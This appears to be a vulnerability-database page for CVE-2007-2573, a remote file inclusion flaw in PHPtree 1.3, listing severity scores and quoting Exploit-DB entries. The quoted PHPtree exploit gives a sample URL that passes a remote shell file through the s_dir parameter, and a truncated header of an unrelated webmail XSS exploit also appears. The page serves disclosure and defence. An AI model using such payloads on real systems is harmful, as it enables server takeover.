CVE-2007-2573
published 2007-05-09CVE-2007-2573: PHP remote file inclusion vulnerability in plugin/HP_DEV/cms2.php in PHPtree 1.3 allows remote attackers to execute arbitrary PHP code via a URL in the s_dir…
PriorityP342high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.79%
84.6th percentile
PHP remote file inclusion vulnerability in plugin/HP_DEV/cms2.php in PHPtree 1.3 allows remote attackers to execute arbitrary PHP code via a URL in the s_dir parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| phptree | phptree | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
T-dah Webmail Client - Multiple Persistent Cross-Site Scripting Vulnerabilities
exploitdb·2012-08-17
CVE-2012-2573 T-dah Webmail Client - Multiple Persistent Cross-Site Scripting Vulnerabilities
T-dah Webmail Client - Multiple Persistent Cross-Site Scripting Vulnerabilities
---
#!/usr/bin/python
'''
# Exploit Title: T-dah Webmail Multiple Stored XSS issues.
# Date: 17/08/2012
# Exploit Author: Shai rod (@NightRang3r)
# Vendor Homepage: http://tdah.us/
# Software Link: http://sourceforge.net/projects/t-dahmail/files/latest/download?utm_expid=6384-3&utm_referrer=http%3A%2F%2Fsourceforge.net%2Fprojects%2Ft-dahmail%2F
# Version: 3.2.0
#Gr33Tz: @aviadgolan , @benhayak, @nirgoldshlager, @roni_bachar
About the Application:
T-dah is an Open Sourced Universal Webmail origially developed by Aldoir Ventura under the name Uebimiau in which we picked up late in 2007.
It is free and can be installed on any server that supports PHP.
Vulnerability Description
1. XSS In message body (HRE
Exploit-DB
PHPtree 1.3 - 'cms2.php?s_dir' Remote File Inclusion
exploitdb·2007-05-05
CVE-2007-2573 PHPtree 1.3 - 'cms2.php?s_dir' Remote File Inclusion
PHPtree 1.3 - 'cms2.php?s_dir' Remote File Inclusion
---
#PHPtree Remote file inclusion (s_dir)
#Download script : http://www.phptree.de/content/download/public/phptree/phptree_v1.3.zip
#Thanks Str0ke
#Exploit
#http://site.com/[phptree_path]/plugin/HP_DEV/cms2.php?s_dir=shell.txt?
#Discovered by : ThE TiGeR
#Miro_Tiger100[at]Hotmail[dot]com
# milw0rm.com [2007-05-05]
No writeups or analysis indexed.
http://osvdb.org/35819http://secunia.com/advisories/25174http://www.vupen.com/english/advisories/2007/1675https://exchange.xforce.ibmcloud.com/vulnerabilities/34106https://www.exploit-db.com/exploits/3860http://osvdb.org/35819http://secunia.com/advisories/25174http://www.vupen.com/english/advisories/2007/1675https://exchange.xforce.ibmcloud.com/vulnerabilities/34106https://www.exploit-db.com/exploits/3860
2007-05-09
Published